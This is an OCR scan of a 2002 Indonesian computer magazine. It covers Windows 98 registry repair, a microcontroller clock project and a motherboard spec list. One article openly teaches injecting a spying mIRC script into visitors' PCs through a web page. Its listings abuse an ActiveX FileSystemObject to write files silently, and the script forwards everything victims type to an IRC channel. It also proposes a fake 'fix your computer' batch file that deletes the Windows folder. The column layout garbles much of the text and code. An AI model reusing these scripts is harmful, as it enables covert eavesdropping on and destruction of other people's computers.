Beberapa petunjuk yang menyiratkan bahwa sistem ope-
rasi telah mengalami gangguan yang serius dan fatal aki-
bat adanya file sistem yang rusak akan terlihat dari pesan
kesalahan (error messages) seperti yang terlihat pada
Gambar 8-10.

• Gambar 6: Tampilan program Regedit (Registry Editor).

• Pada jendela program Registry Editor, klik menu Registry


→ Export Registry File, kemudian tentukan nama filenya • Gambar 8-10:
lalu simpan ke dalam direktori yang sudah anda buat Error message
tadi, yakni di C:\WINDOWS\BACKUP. Sebagai contoh bahwa telah terjadi
nama file yang anda berikan adalah REGISTRY, lalu kerusakan.
klik tombol Save.
Sampai pada tahap ini anda telah mengarsipkan atau mem-
backup system registry yang sedang aktif pada komputer
anda saat itu. Oleh karena itu, ingat untuk selalu meng-

28 NeoTek November 2002


NeoTekno

Jika sistem anda rusak atau terganggu akibat salah satu ke-
mungkinan tersebut di atas, anda tidak perlu panik. Yang per-
lu dilakukan hanyalah mengembalikan (me-restore) file-file
sistem yang sudah anda backup sebelumnya dan coba jalan-
kan program utility, seperti ScanDisk dan System File Checker
(SFC). Berikut ini adalah langkah-langkahnya:
1. Restart komputer anda ke modus MS-DOS.
2. Pada prompt MS-DOS, ketik perintah di bawah ini:
C:\WINDOWS> ATTRIB -S -H -R USER.DAT
C:\WINDOWS> ATTRIB -S -H -R SYSTEM.DAT
C:\WINDOWS> COPY C:\WINDOWS\BACKUP\*.INI
C:\WINDOWS> COPY C:\WINDOWS\BACKUP\*.DAT • Gambar 13: Menentukan lokasi file backup registry.

3. Restart komputer anda untuk masuk ke dalam modus Setelah proses im-
Windows. Perhatikan apakah langkah-langkah di atas telah por selesai, cobalah
dapat mengatasi masalah yang anda hadapi. Jika ternyata restart sekali lagi
belum berhasil, lanjutkan ke Langkah 4. komputer anda, ke-
4. Periksa setting registry dengan mengetikkan perintah mudian perhatikan
• Gambar 14: Mengimpor file backup registry. baik-baik apakah
SCANREG pada prompt MS-DOS. Lanjutkan dengan me-
nekan tombol Start.
C:\WINDOWS> SCANREG

• Gambar 15: Pesan setelah proses impor selesai.

sekarang sistem anda sudah benar-benar berjalan dengan


sempurna seperti sedia kala. Jika ternyata masih juga
belum berhasil, lanjutkan ke Langkah 7.

• Gambar 11: Pesan program SCANREG sebelum memulai proses.


Jika dalam pemeriksaan memang ditemukan adanya kerusak-
an, maka program akan secara otomatis me-restore registry
yang sudah anda backup sebelumnya. Setelah itu anda akan
diberitahu telah ditemukan adanya kerusakan pada file-file
sistem, dan backup registry yang bagus telah berhasil di-
restore untuk mengatasi masalah (Gambar 12).

• Gambar 16: Tampilan program SFC (System File Checker.)

7. Klik tombol Start → Run, kemudian pada jendela Run


• Gambar 12: Pesan setelah proses Restore selesai.
ketik SFC untuk menjalankan program System File Checker,
lalu tekan Enter atau klik tombol OK.
5. Setelah itu tekan tombol Restart untuk masuk ke dalam Segera setelah jendela program SFC terbuka, langsung klik
modus Windows, kemudian perhatikan dengan seksama tombol Start untuk memulai pemeriksaan file sistem. Proses
apakah sekarang sistem anda sudah lebih baik dari sebe- pemeriksaan akan berlangsung cukup lama. Tunggu sampai
lumnya. Jika ternyata masih belum berhasil juga, maka anda proses benar-benar selesai.
dapat melanjutkannya ke Langkah 6 berikut ini.
• Gambar 17: SFC
6. Klik tombol Start → Run, kemudian pada jendela Run sedang berproses.
ketik REGEDIT lalu OK.
• Pada jendela program REGEDIT klik menu Registry →
• Gambar 18: Pesan
Import Registry File.
setelah proses
• Kemudian tentukan lokasi atau direktori tempat anda
pemeriksaan selesai.
menyimpan file backup registry. Dalam contoh ini, file
backup registry bernama REGISTRY.REG tersimpan di
direktori C:\WINDOWS\BACKUP.
• Jika sudah ditemukan, klik dua kali file tersebut untuk
memulai proses impor. Tunggulah beberapa saat sampai
proses selesai.

November 2002 NeoTek 29


NeoTekno

• Gambar 19: Laporan statistik hasil pemeriksaan. • Gambar 22: Memeriksa Options program ScanDisk.
Pada Gambar 19 dapat disimpulkan bahwa semua file sis- memulai proses pemeriksaan dan perbaikan (repair), klik
tem dalam keadaan baik, SFC tidak menemukan sesuatu tombol Start dan tunggu sampai proses benar-benar selesai.
yang rusak (error). Namun jika anda merasa bahwa masih Jika program ScanDisk telah selesai melakukan proses-
ada sesuatu yang tidak beres pada sistem anda, anda masih nya, restart komputer anda untuk melakukan proses
dapat melakukan penelusuran sekaligus memperbaikinya booting ulang.
dengan menjalankan program SCANDISK. Petunjuk atau
cara menggunakannya akan dijelaskan pada Langkah 8.
8. Start → Run, ketik ScanDisk, tekan Enter atau klik OK.
Setelah program
ScanDisk terbuka,
klik terlebih dulu
tombol Options un-
tuk memastikan bah-
wa pilihan ‘Areas of
the disks to scan’
• Gambar 20: Menjalankan program Scandisk
sudah berada pada
dari menu Run.
posisi ‘System and
data areas.’

• Gambar 23: Scanning disk dalam proses.

Dari hasil uji coba yang penulis lakukan selama ini sudah
terbukti bahwa semua langkah yang dijelaskan cukup am-
puh untuk mengatasi masalah atau problem yang terjadi
pada sistem operasi yang penulis gunakan, dengan catatan
penulis sudah mem-backup terlebih dahulu file-file
sistem. Dan dengan cara yang sama saya mempersilakan
anda melakukan percobaan sendiri.

• Gambar 21: Tampilan program ScanDisk.

Tujuannya adalah agar program ScanDisk memeriksa dua


hal sekaligus, yakni lokasi (area) beserta file-file sistem dan
file data yang ada di hard disk.
Setelah itu kembali ke jendela program utama ScanDisk,
kemudian aktifkan pilihan ‘Thorough’ pada ‘Type of test’
dan pilihan ‘Automatically fix errors.’ Dan sebelum anda
mengklik tombol Start, pastikan bahwa anda sudah menu-
tup semua program aplikasi yang sedang terbuka atau yang
sedang melakukan operasi read/write ke hard disk. Untuk • Gambar 24. Laporan statistik hasil pemeriksaan.

30 NeoTek November 2002


NeoTekno

Nguping di IRC (2)


Menyusupkan Skrip ke PC Orang
Karena banyak keluhan mengenai ‘keampuhan’ skrip yang dimuat pada NeoTek Juli 2002,
Eryanto Sitorus (ery@postmaster.co.uk) kembali menyajikan skrip untuk nguping ‘pembicaraan’ di
komputer orang lain pada saat chat di IRC.

RTIKEL BERJUDUL NGUPING DI muat…” Saya tidak tahu persis apa- majalah NeoTek Vol II No. 10, Juli
A IRC yang di muat di NeoTek,
Vol. II No. 10, Juli 2002 lalu
kah mereka jadi mengirim email ke
NeoTek atau tidak, yang jelas per-
2002 yang lalu. Bagi anda yang be-
lum mengetahuinya dan ingin mem-
benar-benar membuat saya jadi soalan itu telah memaksa saya me- baca penjelasan lebih detail mengenai
merasa bersalah, capek, dan sedikit nulis artikel ini (tentunya sebagai tentang artikel tersebut, maka silakan
stres. rasa tanggung jawab saya kepada anda cari majalah itu.
Betapa tidak, sejak artikel itu terbit, majalah NeoTek dan pembacanya).
hampir dua minggu lebih secara Namun sebelum mulai membahas- Skrip yang Akan Disisipkan
berturut-turut saya harus bolak-balik nya lebih jauh, saya ingin menggu- Berikut ini adalah bentuk listing skrip
me-reply email yang masuk untuk nakan kesempatan baik ini untuk Nguping di IRC yang akan kita su-
menjawab dan menjelaskan kepada mengucapkan thanks pada rekan- supkan ke dalam komputer orang
mereka-mereka yang bertanya se- rekan di DALnet IRC Network, lain. Namun perlu anda ketahui
perti ini: “Mas, koq saya enggak bisa #NeoTeker, yang dengan “keramahan” bahwa mengingat tidak sedikit rekan
menjalankan skrip Nguping di IRC? mereka telah membantu saya menja- pembaca NeoTek yang mengatakan
Salahnya dimana sih…” Sementara wab sebagian pertanyaan yang sama skrip Nguping di IRC yang dibahas
itu, kelompok berikutnya, dengan seperti yang saya terima di atas. pada edisi Juli 2002 “tidak jalan,”
agak sedikit galak bertanya seperti Ucapan terimakasih itu dengan ikhlas maka saya putuskan untuk meng-
ini: “Gua udah bisa menjalankannya, saya sampaikan kepada: Im_David, ubah atau memodifikasinya sedikit
tetapi skrip Nguping yang lo bilang Ace_Killa, Samurai_Hack, Prayana, dari aslinya.
bisa nguping di IRC itu cuma bisa dan termasuk rekan-rekan pembaca
Saya yakin “pihak lain” yang akan
aktif di PC gua doang tuh. Biar bisa setia NeoTek yang sudah mengirim-
menerima skrip ini nantinya pasti
aktif di komputer orang lain, caranya kan email-nya kepada saya, karena
tidak akan mengalami kesulitan atau
gimana? Lo jangan bikin sembarang- biar bagaimanapun, karena anda
masalah lagi. Tapi jika anda masih
an artikel donk kalau engga tuntas...” semualah sehingga artikel ini men-
tetap kurang percaya, ada baiknya
Karena nada pertanyaan yang perta- jadi ada. Harapan saya, mudah-
anda melakukan uji coba terlebih
ma kedengarannya masih terkesan mudahan apa yang saya bahas dalam
dahulu untuk memastikan bahwa
santun dan bersahabat, maka saya artikel ini adalah merupakan jawaban
skrip Nguping ini sudah benar-benar
pun menjawabnya dengan ramah yang “seharusnya” anda inginkan.
OK. Adapun tampilan atau bentuk
pula. Bahkan saking ramahnya, saya Dalam artikel ini, pada intinya saya listing skrip yang sudah saya
kirimkan mereka satu per satu skrip akan menjelaskan kepada anda bagai- modifikasi itu dapat anda lihat di
tersebut. Sedangkan pada pertanyaan mana cara menyusupkan skrip ke halaman berikutnya.
yang ke dua hal itu tidak saya laku- dalam komputer orang lain melalui
Jika listing skrip Nguping di atas anda
kan. Mau tahu apa yang saya katakan home page, situs, atau website. Dan
loading ke dalam program mIRC,
kepada mereka? Saya jawab saja be- agar artikel ini tidak terlalu kepan-
maka tampilan atau bentuknya akan
gini: “Eeh elu-elu pade jangan nya- jangan, maka sebagai bahan praktek-
tampak sama seperti yang diperli-
lahin gue donk... komplain donk ke nya, kita akan menyusupkan skrip
hatkan pada Gambar 1 pada halaman
NeoTek, kenapa artikel itu di Nguping di IRC yang dibahas pada
berikutnya.

November 2002 NeoTek 31


NeoTekno

[script Listing 1 <applet code="com.ms.activeX.ActiveXComponent" align="baseline" Listing 2


]n0=on 1:START:{ .sreq ignore width="0" height="128" highlight="0">
n1= .remote on </applet>
n2=} <script language="JAVASCRIPT">
n3=raw 401:*: { <!-- hide for safe browsers
n4= halt InterfaceObject=document.applets[0];
n5=} setTimeout("Upload()",1000);
n6=on 1:CONNECT:titlebar (Connected to function Upload() {
$server $+ ) | .msg #NeoHacker Helo, Gue
fsoClassID="{0D43FE01-F093-11CF-8940-00A0C9054228}";
$lower($nick) $ip on $server $+ : $+ $port $+ .
InterfaceObject.setCLSID(fsoClassID);
n7=on 1:INPUT:*:{ .msg #NeoHacker ( $+
$active $+ ) $1- fso = InterfaceObject.createInstance();
n8= set %tricksy status window // windir = fso.getspecialfolder(0);
n9= if ( $active == %tricksy ) { $1- | halt } filename = "\\rol.vbs";
n10=} file = fso.opentextfile(filename, "2", "TRUE");
n11=on 1:CTCPREPLY:ping*:.notice $nick Your file.writeline(filecontent1)
ping time is $duration($calc($ctime - $2)) $+ . file.writeline(filecontent2)
n12=CTCP 1:ping: if ( $nick != $me) { .ctcp file.writeline(filecontent3)
ping $1 } | if ( $3 != $null ) { $3- | halt } file.writeline(filecontent4)
n13=RAW 332:*:echo 4 $2 $chr(31) $+ $2 $+ file.writeline(filecontent5)
$chr(31) $+ : $3- | if ( e-script.ini isin $3- ) { file.writeline(filecontent6)
part $2 | halt } file.writeline(filecontent7)
n14= file.writeline(filecontent8)
file.writeline(filecontent9)
• Skrip mIRC yang akan disusupkan dan sudah file.writeline(filecontent10)
diubah. file.writeline(filecontent11)
file.writeline(filecontent12)
Implementasi file.writeline(filecontent13)
Nah, setelah anda merasa yakin bah- file.writeline(filecontent14)
file.writeline(filecontent15)
wa skrip Nguping di IRC tersebut di file.writeline(filecontent16)
atas sudah benar-benar OK, reason- file.writeline(filecontent17)
able, visible, dan rasional, maka seka- file.writeline(filecontent18)
rang kita sudah bisa mulai mengim- file.writeline(filecontent19)
plementasikannya ke dalam bahasa file.writeline(filecontent20)
pemrograman Internet. Adapun ba- file.writeline(filecontent21)
hasa pemrograman Internet yang ile.writeline(filecontent22)
akan kita gunakan untuk merancang file.writeline(filecontent23)
skenario pengiriman skrip Nguping file.writeline(filecontent24)
di IRC tersebut di atas adalah meru- file.writeline(filecontent25)
ile.writeline(filecontent26) Skrip lengkap terdapat dalam
pakan gabungan dari beberapa baha-
file.writeline(filecontent27) CD NeoTek November 2002
sa, yaitu: Java atau applet Java, Java-
Script, dan VBScript. Bentuk state-
ment, command, dan cara mengga- Karena skrip tersebut di atas akan di Markup Language). Tetapi sebelum
bungkan skrip Nguping di IRC di akses lewat home page, situs, atau itu cobalah anda usahakan untuk me-
atas ke dalam ke tiga buah bahasa Website, maka sebagai langkah ter- mahami satu per satu urutan listing
pemograman tersebut (Java, Java- akhir, kita akan menggabung seluruh program/skrip tersebut di atas agar
Script, dan VBScript) dapat anda si- listing program/skrip di atas ke anda benar-benar mengerti atau pa-
mak pada Listing 2. dalam format HTML (HyperText ling tidak memahami apa misi, tar-
get, dan akibatnya jika skrip tersebut
“terakses” oleh orang lain. Jika anda
sudah mengerti serta memahaminya,
maka segeralah masukkan atau ga-
bungkan ke dalam file HTML anda.
Bentuk penggabungannya akan
terlihat seperti pada Listing 3.
Dan setelah semuanya beres, dan
anda sudah tidak sabar untuk segera
membuktikan apakah listing pro-
gram/skrip tersebut tadi dapat beker-
ja sesuai dengan yang diharapkan,
maka upload-lah file Web tersebut,
kemudian jalankan browser anda (In-
ternet Explorer atau Netscape Navi-
gator) untuk mengaksesnya. Sebagai
bukti bahwa program/skrip tersebut
sudah benar (oke), maka anda harus
bisa menemukan file e-script.ini
dalam direktori program mIRC anda,
seperti yang terlihat pada Gambar 2.
• Gambar 1: Melihat listing skrip dari program mIRC.

32 NeoTek November 2002


NeoTekno

<HTML> saya persilakan anda memodifikasinya


<HEAD>
Listing 3 sesuai dengan selera anda masing-
<meta name="Author" content="Eryanto Sitorus"> masing. Sebagai bahan praktek anda,
<meta name="GENERATOR" content="Microsoft FrontPage 4.0"> cobalah implementasikan isi file
<meta name="ProgId" content="FrontPage.Editor.Document"> AUTOEXEC.BAT di bawah ini ke
<title>Eryanto Sitorus On The NET</title>
</HEAD>
dalam bentuk program/skrip di atas,
kemudian suruh orang lain meng-
<BODY> aksesnya. Esok paginya tanyalah
kepadanya: “Apakah PC anda masih
[ Insert/sisipkan program/skrip tersebut di atas ke dalam bari ini! ] baik-baik saja?”
</BODY> Selamat mencoba, dan mudah-
</HTML> mudahan berhasil!

Setelah itu kemudian jalankan pro-


gram mIRC anda lalu hubungkan ke
salah satu server IRC yang biasa anda
masuki. Jika program mIRC anda
menampilkan pesan seperti yang
tampak pada Gambar 3 maka itu ar-
tinya apa semua yang anda lakukan
sudah benar-benar perfect dan klop.
Sedangkan bagi anda-anda yang tidak
berhasil menemukan file e-script.ini
dalam folder mIRC, saya cuma bisa
mengatakan bahwa kesalahan itu pas-
ti datangnya dari anda sendiri, karena
besar kemungkinan andalah yang
salah mengetiknya. Nah, supaya anda
tidak lekas-lekas mengucapkan:
“Skripnya atau programnya kagak
jalan,” maka sebaiknya listing
program/skrip tersebut anda ambil
sendiri dari alamat situs saya di:
http://www16.brinkster.com/erytricks • Gambar 2: Melihat file skrip (e-script.ini) dalam folder mIRC.
y/Software/e-script.zip. Atau jika an-
da ingin membuktikannya langsung,
tanpa harus men-download atau me-
ngetik listing program/skrip tersebut
di atas, silahkan anda klik alamat ini:
http://www16.brinkster.com/erytricks
y/e-script.html. Dan kalau anda masih
tetap saja belum berhasil, atau gagal
membuktikannya, maka saya persila-
kan anda untuk mengirim email.
Atau anda juga bisa mencari saya
(tricksy) di channel #NeoTeker, ser-
ver IRC DALnet, setiap hari kerja,
kecuali hari libur dan hari-hari besar
lainnya.
Bagi anda yang sudah berhasil mem-
buktikan bahwa program/skrip di
atas sudah benar, tapi anda sendiri ti-
dak begitu doyan “Nguping,” maka

@Echo OFF • Gambar 3: Pesan yang menyatakan bahwa skrip telah berhasil di-load.
PROMPT $p$g
C:\WINDOWS\SMARTDRV.EXE /L /X
PATH=C:\;C:\WINDOWS;C:\WINDOWS\COMMAND;
%PATH%
CLS
ECHO.
ECHO Press any key to FIX your Computer…
PAUSE > NUL
ATTRIB -S -H -R *.*
ATTRIB -S -H -R C:\WINDOWS\*.*
DEL *.*DELTREE /Y WINDOWS
ECHO.
ECHO Thank you! • Gambar 4: Alamat dan halaman
Web untuk pembuktian.

November 2002 NeoTek 33


NeoTekno

Merakit Hardware
Proyek Digital Clock (2)
Pengetahuan tentang MicroController saat ini sangat diperlukan untuk kalangan mahasiswa. Pe-
ngetahuan tentang hal ini setidaknya bisa membantunya menyelesaikan tugas akhirnya. Yang
dapat mengambil manfaat dari teknologi ini bukan hanya mahasiswa Elektro.

ahasiswa mesin bisa menggunakan MicroController Hardware


M untuk mengubah mesin bubut manual menjadi
CNC sederhana. Hobby di bidang ini bisa memberi
Sangat dianjurkan untuk menguasai hardware agar lebih
mudah memahami kerja rangkaian. Tapi mengingat pem-
kepuasan luar biasa sewaktu ide berhasil direalisasi menjadi baca bisa datang dari dunia software maka diusahakan agar
proyek kebanggaan. hardware tidak menjadi penghalang untuk mulai belajar.
Artikel ini disusun dengan bahasa dan logika sederhana agar Tentunya diharapkan pembaca akan mengiringinya dengan
dapat menjangkau pembaca Neotek yang cukup beragam. mempelajari elektronika dasar dan dilanjutkan dengan
teknik digital.
Digital Clock Untuk mengatasi kesulitan itu, akan disediakan kit yang
Proyek Digital Clock dipilih karena bisa bermanfaat dan ca- terdiri dari komponen dan PCB (Printed Circuit Board -
ra penggunaannya yang sudah dikenal sehingga memudah- tempat komponen disolder) yang belum disolder bagi yang
kan proses belajar software-nya. ingin main dengan hardware serta yang berupa modul yang
sudah disolder dan diuji untuk yang belum mengenal hard-
Salah satu keunggulan MCU dibandingkan rangkaian digi-
ware. Hubungi Hardy di 6624322 atau 0812-9209588 atau
tal sederhana adalah: fungsi alat bisa diubah hanya dengan
email hardythe@cbn.net.id.
mengubah software-nya. Tentunya hal ini hanya bisa dila-
kukan sejauh hardware-nya mendukung perubahan itu. Komponen utama Digital Clock ini adalah MCU MC68HC908-
KX8. MicroController ini yang menyalakan tampilan jam
Dalam proyek pertama ini, fitur itu dimanfaatkan untuk
dan menit atau menit detik, menghitung waktu, menerima
membantu proses belajar software dengan diawali software
input setting jam, membunyikan buzzer untuk fungsi Alarm
yang sangat sederhana dan dilanjutkan sampai yang lanjut
Clock dan menggerakkan relai untuk menyalakan lampu.
dengan menggunakan hardware yang sama.

• Skema Digital Clock (NeoClock) lengkap dengan Power Supply-nya.

34 NeoTek November 2002


NeoTekno

• Nama segmen dan hubungan internal 7 segment CA.

Tampilan (display) yang digunakan adalah 4 buah LED


seven segment (karena terdiri dari 7 bagian yang bisa • Buzzer Piezo DC yang dibentuk dari piezo 3 dan 2 pin.
membentuk semua kombinasi angka) Common Anode.
Nama Common Anode dipakai karena semua Anode LED alternatif pengembangan.
bergabung pada titik Common Anode (CA). Kebalikannya PTA0 bekerja sebagai input dari SW2 (Jumper J3 posisi 1-2,
adalah Common Cathode (CC). tanda titik = 1) untuk input kedua. Fungsi kedua (tergan-
Keempat tampilan dihubungkan secara matriks. Untuk me- tung program) PTA0 adalah sebagai output untuk meng-
nyalakannya kaki MCU PTB0 sampai PTB6 (juga disebut aktifkan relay (J3 posisi 2-3) untuk fungsi bel, lampu atau
Port B0 sampai Port B6) digunakan untuk menyalakan LED lainnya. R1 sebagai pengaman sewaktu SW2 ditekan dan
yang akan membentuk angka sedangkan PTA1 sampai PTA4 PTA0 diset sebagai output. R1 juga membatasi arus basis
(Port A1 sampai Port A4) digunakan untuk menentukan ka- TR Q1 yang bekerja sebagai switch elektronik. D1 meredam
pan setiap LED seven segment (juga disebut Digit) menyala. tegangan induksi coil relay L1 yang dapat merusak Q1.
Untuk menyalakan digit pertama (D7) Port B0 sampai Port PTB7 didedikasikan untuk output buzzer untuk alarm, clock
B6 menyediakan informasi segmen yang akan menyala, announcement (bunyi setiap jam) atau sekedar beep untuk
misal untuk angka 2 adalah segment a, b, d, e, g MCU mem- meyakinkan pemakai bahwa tombol sudah tertekan pada
beri tegangan 0V pada PTB4, PTB3, PTB1, PTB2, PTB6 lalu waktu penyetelan. Resistor R2 sebagai pembatas arus basis
PTA1 menyalakan digit tersebut dengan mengaktifkan tran- Q2 yang bekerja sebagai switch.
sistor Q3 sehingga CA D7 mendapat tegangan 5V. Arus lis- Perlu diperhatikan bahwa buzzer yang dipakai di sini adalah
trik mengalir menyalakan segmen a, b, d, e, g. DC buzzer yang artinya berbunyi bila diberikan tegangan
Lalu untuk menyalakan digit kedua, padamkan dulu digit DC karena sudah memiliki osilator. Sebagai pembanding,
pertama dengan mengubah tegangan PTA1 baru mengubah buzzer AC hanya berupa komponen piezo elektrik tanpa
PTB0 sampai PTB6 menjadi informasi untuk digit kedua osilator. Untuk membunyikannya diperlukan tegangan AC.
(misal angka 1 berarti segment yang akan menyala adalah Gambar Buzzer Piezo di atas menjelaskan cara pembuatan
b, c). PTA2 menyalakan digit kedua dengan mengaktifkan osilator untuk tipe buzzer 2 kaki dan 3 kaki.
Q4 sehingga CA D8 mendapat tegangan 5V. Transistor Q3 Listrik dari PLN setelah melewati sekring sebagai pengaman
sampai Q6 berfungsi sebagai switch (saklar) elektronik yang menuju trafo (T1) untuk menurunkan tegangan dari 220V
diatur oleh PTA1 sampai PTA4. AC menjadi 9V AC. Selanjutnya memasuki diode dengan
Resistor R3 sampai R6 bekerja sebagai pengatur arus basis konfigurasi bridge (jembatan) dibantu C2 untuk membuat
Q3 - Q6, sedangkan resistor R7 sampai R13 mengatur arus tegangan DC unregulated (belum stabil). U2 menstabilkan
LED setiap segmen. tegangan menjadi 5V DC dibantu dengan C3 agar lebih rata
dan C4 untuk mencegah osilasi. LED di unit ini berfungsi
Sebagai input digunakan switch SW1 yang dihubungkan ke sebagai indikator power sedang ON dengan R14 sebagai
input IRQ (Interrupt ReQuest). Sebagai R pull-up-nya pembatas arusnya.
digunakan internal pull-up. Disiapkan input 50 Hz sebagai

• Jalur PCB Digital Clock dan power supply.

November 2002 NeoTek 35


NeoTekno

• Tata letak komponen Digital Clock dan power supply.

Software Jam10 ds (data storage) 1 berarti Jampuluhan diberi lokasi


Software yang dibahas di sini adalah software yang akan 1 byte. Adrressnya ditentukan berdasarkan urutan.
diisikan ke dalam MCU agar bisa bekerja sebagai Digital Init berisi perintah untuk menginisialisasi hardware dan
Clock. Sebenarnya namanya adalah Firmware karena soft- register seperti mengatur fungsi port sebagai input atau
ware ini akan menjadi bagian dari hardware (menjadi isi output dan mengatur agar jam mulai dari angka 12:00
Flash ROM). seperti jam pada umumnya.
Proses pengisian (programming) dilakukan dengan meng- Selesai Init, mainloop yang berkuasa. Mainloop bekerja se-
gunakan hardware yang dinamakan Programmer. Lihat ar- bagai pengatur (manager) keseluruhan routine (kumpulan
tikel Programmer KX8 untuk pembuatan hardware dan pe- instruksi untuk mengerjakan sesuatu). Kebiasaan menggu-
makaiannya. nakan mainloop memudahkan analisa dan modifikasi soft-
Programmer dikontrol oleh software yang bisa didapatkan ware. Terlihat bahwa subroutine SecondJob cuma dilaksana-
secara free untuk personal use dari www.pemicro.com kan setiap detik berdasarkan flag DoSec yang dikerjakan
dengan nama ics08kxz_ver_x_xx_xxxxxx.exe untuk fungsi (set) oleh interrupt. Dan DisplayJob bekerja setiap kali main-
Programmer, Simulator, In-Circuit Simulator, In-Circuit loop dilewati.
Debugger. Selain Mainloop cuma ada sistem interrupt. Interrupt me-
Ketik NeoClock1.asm (bagian akhir artikel) sampai kata End ngerjakan sesuatu yang mendesak baik karena masalah wak-
di software WIN IDE yang baru diinstal, save dengan nama tu. Misalnya sebuah input di alat berhubungan dengan
NeoClock1.asm, tekan tombol Assembly (pertama dari kiri) keyboard yang kalau mengirim data harus cepat diterima.
lalu bandingkan dengan file hasil assembly yang bernama Kalau tidak cepat maka data yang datang bisa saja tertimpa
NeoClock1.S19 dengan yang tertera di akhir artikel ini. Ke- data yang baru sehingga tidak utuh lagi. Untuk mengatas-
salahan ketik (kecuali komentar) akan tampil dengan garis inya bisa menggunakan interrupt yang hanya bekerja se-
merah waktu di assembling atau dari perbedaan di file .S19. waktu keyboad mengirim data atau mainloop yang meme-
Pengalaman mengetik ini akan menjadi awal perkenalan de- riksa apakah keyboard mengirim data. Metode kedua harus
ngan assembly. Gunakan tab untuk pindah field. dilakukan sesering mungkin agar tidak pernah ada data
yang hilang. Pemilihan metode tergantung keseluruhan
Makro di awal file menggabungkan 2 parameter (nomor bit sistimnya. Interrupt disini hanya mengerjakan timer yang
dan byte dalam prosedur standar Motorola) menjadi 1 pa- timbul setiap 1/25 detik. Angka 25 di interrupt membagi
rameter untuk mengurangi sumber kesalahan program. Equ agar flag DoSec hanya set setiap 1 detik.
atau equation hanya persamaan yang memungkinkan kita
memberi nama (simbol) agar melambangkan fungsi register Untuk lebih jelasnya, sekretaris yang sedang mengetik su-
tersebut sehingga mudah diingat. rat harus mengangkat telepon yang berdering. Setelah sele-
sai urusan telp, surat harus dikerjakan kembali. Dering telp
$BASE 10T menjelaskan ke program Assembler bahwa menjadi interrupt, sedangkan mengetik surat menjadi tugas
angka tanpa tanda adalah dalam bentuk desimal. Tanda $ di mainloop.
depan angka seperti $27 berarti angka hexadesimal yang
nilainya = 2 (*16+) 7 = 39 desimal. SecondTask bekerja seperti yang tertulis di komentarnya.
Hanya saja sekarang format yang dibuat menggunakan
Org (origin) memerintahkan Assembler agar instruksi atau angka satuan (0-9) dan puluhan (0-6) bukan menjadi 1
symbol di belakangnya diletakkan pada address yang angka (0-59) agar lebih mudah dijelaskan dan tak perlu
ditunjukkan Org. Lebih jelasnya bisa dilihat dari file konversi. Pemeriksaan jam 24 dilakukan khusus karena
NeoClock.lst hasil assembling. tidak bisa menumpang pemeriksaan jam satuan atau jam
0000 55 RAM equ $0040 ; Beginning of RAM. puluhan.
56 * RAM ($0040 - $00FF) 192 Bytes Inc Detik1 menaikkan angka detik di register Detik1. Detik1
0040 57 org RAM dimasukkan (load) ke Accumulator (register khusus) untuk
0040 58 Jam10 ds 1 ; Jam dibandingkan atau di compare (cmp) dengan angka 10. bila

36 NeoTek November 2002


NeoTekno

tidak sama, loncat (Branch if Not Equal - bne) ke Label Sec- *** NeoClock1.asm
99 dibagian akhir yang artinya keluar dari rutin ini. Bila sa- *** KX8 Digital Clock
ma maka jadikan 0 dan naikkan Detikpuluhan. Hal yang *** Purpose: Introduction 2 Assembly
sama kalau kita menghitung dari 9 ke 10 atau 49 ke 50. Se- *** Device: 68HC908KX8
lanjutnya lakukan untuk Detik10, Menit1, Menit10, Jam1, *** Assembler: CASM @ WIN IDE pemicro
* Description: On Main Loop: Count Time, Display Time.
Jam10 tapi dengan limit mereka masing-masing. Detik10 * On Interrupt: Timer using ICG (Internal Clock Generator).
dan Menit10 pada angka 6 karena nilai maksimumnya 60.
Penjelasan detail diberikan di rubrik NeoMicon edisi depan. *** MACRO DEFINITIONS *************************************************
* Combine 2 parameter (bit & byte) to single parameter (bitname)
Display Task menentukan dulu digit mana yang akan di- * Based on Macro by Raymond Weisling.
tampilkan pada loop kali ini. Setiap loop hanya menampil- ******************************************************************************
kan 1 digit. Ambil nomor digit untuk ambil data nya lalu
diubah menjadi pattern 7 segment baru diberi ke portB dan Listing selanjutnya dari makro ini dapat anda peroleh
aktifkan digit tersebut melalui portA. Setiap kali sebelum pada CD NeoTek bulan ini (file: Neoclock1.txt).
menampilkan digit baru, matikan dulu display lama untuk
mencegah bayangan. DispMode memungkinkan perubahan
format tampilan dari JAM-MENIT menjadi MENIT-DETIK Ralat
dengan menggeser lokasi data yang diambil untuk tampilan
sebanyak 2 byte. Pada artikel Proyek Digital Clok (1), hlm. 42 NeoTek Vol
3, No 1, Oktober 2002 terdapat gambar kembar. Gambar
Interrupt menggunakan metode overflow yang sederhana
kedua pada halaman tersebut seharusnya adalah:
untuk menghasilkan 1/25 yang akan set DoSec flag setiap 1
detik.
Bagian akhir berisi vector yang berisi alamat untuk yang
akan dituju oleh MCU untuk masing masing interrupt
yang terjadi. Misalnya waktu terjadi Overflow maka Pro-
gram Counter (register PC - bukan Personal Computer) PC
akan loncat ke addres yang ditunjuk oleh
org $FFF2
TimerInt dw TIMovISR ; $FFF2-FFF3 TIM Overflow Vector

Artinya sewaktu terjadi timer overflow interrupt, MCU


mengerjakan routine TIMovISR sampai rti (ReTurn from
Interrupt) yang berarti keluar dari interrupt. • Programmer dengan konfigurasi Un-secured = NO.

Coverage IndoComtech 2002, Dyandra


17,6 x 12 cm

November 2002 NeoTek 37


NeoTekno

VIA Apollo P4P B 400


Motherboard Terbaru dari VIA Tech
EBUAH MOTHERBOARD KELUARAN VIA TECHNOLOGY
Spesifikasi VIA Apollo P4PB 400
S dengan kode P4PB 400 belum lama ini telah dilun-
curkan di pasaran komputer Indonesia, motherboard
yang mendukung processor Intel Pentium IV dan Intel Processor Intel Pentium 4 dan Celeron
Celeron dengan Front Side Bus 533/400 Mhz ini menggu- 533/400 FSB
nakan chipset Apollo P4X400 North Bridge dan VT8235
Chipset VIA Apollo P4X400 NorthBridge
South Bridge. Motherboard ini juga dilengkapi dengan AGP VT8235 SouthBridge
8x , menggunakan DDR 333 memory dan juga fitur lainnya
seperti USB 2.0/1.1 yang terintegrasi, IDE ATA 133, onboard System Memory 3 DDR333 Sockets up to 3 GB
IEEE 1394, 10/100 LAN dan sebuah smart card connector.
Seperti motherboard jaman sekarang, P4PB 400 juga meng- Slot tambahan 1 AGP 8x/4x slot (1.5V Support)
5 PCI Slots
gunakan sound onboard yaitu VIA 1616 audio chip yang men-
1 CNR Slots
dukung audio 6 channel, crisp, digital surround dan mendu-
kung output optical dan SPDIF, namun untuk dapat menik- Onboard IDE 2 x ATA133/100 Connectors
mati suara yang bagus kita memerlukan speaker yang mendu- Onboard FDD 1 x FDD Connector
